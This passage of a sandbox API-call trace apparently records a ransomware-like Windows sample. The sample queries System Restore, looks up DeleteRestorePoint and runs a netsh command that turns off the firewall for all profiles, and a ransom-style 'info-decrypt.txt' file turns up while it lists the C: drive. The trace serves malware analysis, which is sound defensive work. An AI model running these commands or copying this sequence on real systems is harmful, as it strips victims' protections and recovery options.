[4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0122.875] IUnknown:Release (This=0x602864c) returned 0x3 [0122.875] CoGetContextToken (in: pToken=0x6edaa8 | out: pToken=0x6edaa8) returned 0x0 [0122.875] CoGetContextToken (in: pToken=0x6edeb0 | out: pToken=0x6edeb0) returned 0x0 [0122.875] IUnknown:QueryInterface (in: This=0x6028648, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edf40 | out: ppvObject=0x6edf40*=0x0) returned 0x80004002 [0122.875] IUnknown:Release (This=0x6028648) returned 0x2 [0122.875] CoGetContextToken (in: pToken=0x6ee480 | out: pToken=0x6ee480) returned 0x0 [0122.875] CoGetContextToken (in: pToken=0x6ee3e0 | out: pToken=0x6ee3e0) returned 0x0 [0122.875] IUnknown:QueryInterface (in: This=0x6028648, riid=0x6ee4b0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6ee4ac | out: ppvObject=0x6ee4ac*=0x6028648) returned 0x0 [0122.875] IUnknown:AddRef (This=0x6028648) returned 0x4 [0122.875] IUnknown:Release (This=0x6028648) returned 0x3 [0122.875] IUnknown:Release (This=0x6028648) returned 0x2 [0122.875] CoTaskMemFree (pv=0xbe2300) [0122.875] CoGetContextToken (in: pToken=0x6ee7e8 | out: pToken=0x6ee7e8) returned 0x0 [0122.875] IUnknown:AddRef (This=0x6028648) returned 0x3 [0122.875] IWbemClassObject:Get (in: This=0x6028648, wszName="__GENUS", lFlags=0, pVal=0x6eeafc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb7c*=0, plFlavor=0x6eeb78*=0 | out: pVal=0x6eeafc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x6eeb7c*=3, plFlavor=0x6eeb78*=64) returned 0x0 [0122.876] IWbemClassObject:Get (in: This=0x6028648, wszName="__PATH", lFlags=0, pVal=0x6eeae0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb64*=0, plFlavor=0x6eeb60*=0 | out: pVal=0x6eeae0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=25", varVal2=0x0), pType=0x6eeb64*=8, plFlavor=0x6eeb60*=64) returned 0x0 [0122.876] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=25") returned 0x70 [0122.876] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=25") returned 0x70 [0122.876] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6eeb0c | out: ppv=0x6eeb0c*=0xb51e34) returned 0x0 [0122.876] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6eeb04 | out: pAptType=0x6eeb04*=1) returned 0x0 [0122.876] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6eeb08 | out: ppvObject=0x6eeb08*=0x0) returned 0x80004002 [0122.876] IUnknown:Release (This=0xb51e34) returned 0x1 [0122.876] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ee478 | out: ppv=0x6ee478*=0x6024970) returned 0x0 [0122.877] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024970, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee690 | out: ppvObject=0x6ee690*=0x0) returned 0x80004002 [0122.877] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024970, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee6a4 | out: ppvObject=0x6ee6a4*=0x6025990) returned 0x0 [0122.877] WbemDefPath:IUnknown:Release (This=0x6024970) returned 0x0 [0122.877] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025990, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee2c4 | out: ppvObject=0x6ee2c4*=0x6025990) returned 0x0 [0122.877] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025990, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee280 | out: ppvObject=0x6ee280*=0x0) returned 0x80004002 [0122.877] WbemDefPath:IUnknown:AddRef (This=0x6025990) returned 0x3 [0122.877] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025990, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6edbdc | out: ppvObject=0x6edbdc*=0x0) returned 0x80004002 [0122.877] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025990, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6edb8c | out: ppvObject=0x6edb8c*=0x0) returned 0x80004002 [0122.877] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025990, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edb98 | out: ppvObject=0x6edb98*=0xbe2300) returned 0x0 [0122.877] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe2300, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6edba0 | out: pCid=0x6edba0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0122.877] WbemDefPath:IUnknown:Release (This=0xbe2300) returned 0x3 [0122.877] CoGetContextToken (in: pToken=0x6edbf8 | out: pToken=0x6edbf8) returned 0x0 [0122.877] CoGetContextToken (in: pToken=0x6ee000 | out: pToken=0x6ee000) returned 0x0 [0122.877] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025990, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee090 | out: ppvObject=0x6ee090*=0x0) returned 0x80004002 [0122.877] WbemDefPath:IUnknown:Release (This=0x6025990) returned 0x2 [0122.877] WbemDefPath:IUnknown:Release (This=0x6025990) returned 0x1 [0122.877] CoGetContextToken (in: pToken=0x6ee988 | out: pToken=0x6ee988) returned 0x0 [0122.877] CoGetContextToken (in: pToken=0x6ee8e8 | out: pToken=0x6ee8e8) returned 0x0 [0122.877] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025990, riid=0x6ee9b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ee9b4 | out: ppvObject=0x6ee9b4*=0x6025990) returned 0x0 [0122.877] WbemDefPath:IUnknown:AddRef (This=0x6025990) returned 0x3 [0122.877] WbemDefPath:IUnknown:Release (This=0x6025990) returned 0x2 [0122.877] WbemDefPath:IWbemPath:SetText (This=0x6025990, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=25") returned 0x0 [0122.878] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb38 | out: puCount=0x6eeb38*=0x2) returned 0x0 [0122.878] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb34*=0x11, pszText=0x0) returned 0x0 [0122.878] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb34*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.878] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb04 | out: puCount=0x6eeb04*=0x2) returned 0x0 [0122.878] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb00*=0x11, pszText=0x0) returned 0x0 [0122.878] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb00*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.878] IWbemClassObject:Get (in: This=0x6028648, wszName="sequencenumber", lFlags=0, pVal=0x6eeb00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38a7ee8*=0, plFlavor=0x38a7eec*=0 | out: pVal=0x6eeb00*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x19, varVal2=0x0), pType=0x38a7ee8*=19, plFlavor=0x38a7eec*=0) returned 0x0 [0122.878] IWbemClassObject:Get (in: This=0x6028648, wszName="sequencenumber", lFlags=0, pVal=0x6eeb08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38a7ee8*=19, plFlavor=0x38a7eec*=0 | out: pVal=0x6eeb08*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x19, varVal2=0x0), pType=0x38a7ee8*=19, plFlavor=0x38a7eec*=0) returned 0x0 [0122.878] CoTaskMemAlloc (cb=0x4) returned 0xbe2340 [0122.878] IEnumWbemClassObject:Next (in: This=0x6022d34, lTimeout=-1, uCount=0x1, apObjects=0xbe2340, puReturned=0x389bfe4 | out: apObjects=0xbe2340*=0x0, puReturned=0x389bfe4*=0x0) returned 0x1 [0122.883] CoTaskMemFree (pv=0xbe2340) [0122.883] CoGetContextToken (in: pToken=0x6eea38 | out: pToken=0x6eea38) returned 0x0 [0122.883] WbemLocator:IUnknown:Release (This=0xb5ad94) returned 0x1 [0122.883] IUnknown:Release (This=0x6022d34) returned 0x0 [0122.892] SysReAllocStringLen (in: pbstr=0x6edf64*=0x0, psz="Srclient.dll", len=0xc | out: pbstr=0x6edf64*="Srclient.dll") returned 1 [0122.892] CharLowerBuffW (in: lpsz="Srclient.dll", cchLength=0xc | out: lpsz="srclient.dll") returned 0xc [0122.892] LoadLibraryExW (lpLibFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Srclient.dll", hFile=0x0, dwFlags=0x8) returned 0x0 [0122.892] GetLastError () returned 0x7e [0122.892] SetLastError (dwErrCode=0x7e) [0122.894] SysReAllocStringLen (in: pbstr=0x6edf64*=0x0, psz="Srclient.dll", len=0xc | out: pbstr=0x6edf64*="Srclient.dll") returned 1 [0122.894] CharLowerBuffW (in: lpsz="Srclient.dll", cchLength=0xc | out: lpsz="srclient.dll") returned 0xc [0122.894] LoadLibraryExW (lpLibFileName="Srclient.dll", hFile=0x0, dwFlags=0x0) returned 0x74450000 [0124.743] GetLastError () returned 0x0 [0124.743] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6edf4c*=0x74451060, NumberOfBytesToProtect=0x6edf50, NewAccessProtection=0x4, OldAccessProtection=0x6edf84 | out: BaseAddress=0x6edf4c*=0x74451000, NumberOfBytesToProtect=0x6edf50, OldAccessProtection=0x6edf84*=0x20) returned 0x0 [0124.744] GetCurrentProcess () returned 0xffffffff [0124.744] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6edf4c*=0x74451060, NumberOfBytesToProtect=0x6edf50, NewAccessProtection=0x20, OldAccessProtection=0x6edf84 | out: BaseAddress=0x6edf4c*=0x74451000, NumberOfBytesToProtect=0x6edf50, OldAccessProtection=0x6edf84*=0x4) returned 0x0 [0124.744] GetCurrentProcess () returned 0xffffffff [0124.744] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6edf4c*=0x74451068, NumberOfBytesToProtect=0x6edf50, NewAccessProtection=0x4, OldAccessProtection=0x6edf84 | out: BaseAddress=0x6edf4c*=0x74451000, NumberOfBytesToProtect=0x6edf50, OldAccessProtection=0x6edf84*=0x20) returned 0x0 [0124.744] GetCurrentProcess () returned 0xffffffff [0124.744] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6edf4c*=0x74451068, NumberOfBytesToProtect=0x6edf50, NewAccessProtection=0x20, OldAccessProtection=0x6edf84 | out: BaseAddress=0x6edf4c*=0x74451000, NumberOfBytesToProtect=0x6edf50, OldAccessProtection=0x6edf84*=0x4) returned 0x0 [0124.745] GetCurrentProcess () returned 0xffffffff [0124.745] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6edf4c*=0x744510b0, NumberOfBytesToProtect=0x6edf50, NewAccessProtection=0x4, OldAccessProtection=0x6edf84 | out: BaseAddress=0x6edf4c*=0x74451000, NumberOfBytesToProtect=0x6edf50, OldAccessProtection=0x6edf84*=0x20) returned 0x0 [0124.745] GetCurrentProcess () returned 0xffffffff [0124.745] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6edf4c*=0x744510b0, NumberOfBytesToProtect=0x6edf50, NewAccessProtection=0x20, OldAccessProtection=0x6edf84 | out: BaseAddress=0x6edf4c*=0x74451000, NumberOfBytesToProtect=0x6edf50, OldAccessProtection=0x6edf84*=0x4) returned 0x0 [0124.746] GetProcAddress (hModule=0x74450000, lpProcName="DeleteRestorePoint") returned 0x0 [0124.746] GetProcAddress (hModule=0x74450000, lpProcName="DeleteRestorePointA") returned 0x0 [0124.747] SysReAllocStringLen (in: pbstr=0x6ee6d4*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x6ee6d4*="kernel32.dll") returned 1 [0124.747] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0124.747] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0124.752] GetProcAddress (hModule=0x74450000, lpProcName="_DeleteRestorePoint@4") returned 0x0 [0124.780] CoTaskMemAlloc (cb=0x20e) returned 0xbd8790 [0124.780] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0xbd8790 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0124.781] CoTaskMemFree (pv=0xbd8790) [0124.781] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"netsh.exe\" Advfirewall set allprofiles state off", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x6ee9c4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x38a83f8 | out: lpCommandLine="\"netsh.exe\" Advfirewall set allprofiles state off", lpProcessInformation=0x38a83f8*(hProcess=0x4d4, hThread=0x4d0, dwProcessId=0xb2c, dwThreadId=0xb30)) returned 1 [0125.436] CloseHandle (hObject=0x4d0) returned 1 [0125.924] CloseHandle (hObject=0x4d4) returned 1 [0125.924] CoTaskMemAlloc (cb=0x20e) returned 0xbd8790 [0125.924] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0xbd8790 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0125.924] CoTaskMemFree (pv=0xbd8790) [0125.924] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"netsh.exe\" Advfirewall set allprofiles state off", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x6ee9d4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x38a89f8 | out: lpCommandLine="\"netsh.exe\" Advfirewall set allprofiles state off", lpProcessInformation=0x38a89f8*(hProcess=0x4d0, hThread=0x4d4, dwProcessId=0xaa8, dwThreadId=0xbd0)) returned 1 [0125.935] CloseHandle (hObject=0x4d4) returned 1 [0127.448] GetLogicalDrives () returned 0x4 [0127.448] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x6ee5d4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0130.647] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eeabc) returned 1 [0130.647] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x6eeb38 | out: lpFileInformation=0x6eeb38*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xfccb1620, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccb1620, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0130.647] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eeab8) returned 1 [0130.688] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eeb3c) returned 1 [0130.688] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x6ee644, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0130.688] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x6ee618, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0130.689] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x6ee864 | out: lpFindFileData=0x6ee864*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfccd7780, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccd7780, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0xb7ef50 [0130.689] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6ee874 | out: lpFindFileData=0x6ee874*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xfccd7780, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccd7780, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0130.689] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6ee874 | out: lpFindFileData=0x6ee874*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0130.689] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6ee874 | out: lpFindFileData=0x6ee874*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0130.690] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6ee874 | out: lpFindFileData=0x6ee874*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xfccfd8e0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccfd8e0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0130.690] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6ee874 | out: lpFindFileData=0x6ee874*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0130.690] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6ee874 | out: lpFindFileData=0x6ee874*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xae99ef60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0x0, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0130.690] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6ee874 | out: lpFindFileData=0x6ee874*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfccb1620, ftCreationTime.dwHighDateTime=0x1d68bac, ftLastAccessTime.dwLowDateTime=0xfccb1620, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcdbbfc0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x4d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="info-decrypt.txt", cAlternateFileName="INFO-D~1.TXT")) returned 1 [0130.690] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6ee874 | out: lpFindFileData=0x6ee874*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfccfd8e0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccfd8e0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0130.690] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6ee874 | out: lpFindFileData=0x6ee874*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xaece4da0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0x0, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0130.691] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6ee874 | out: lpFindFileData=0x6ee874*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0130.691] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6ee874 | out: lpFindFileData=0x6ee874*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0130.691] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6ee874 | out: lpFindFileData=0x6ee874*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0130.691] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6ee874 | out: lpFindFileData=0x6ee874*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, 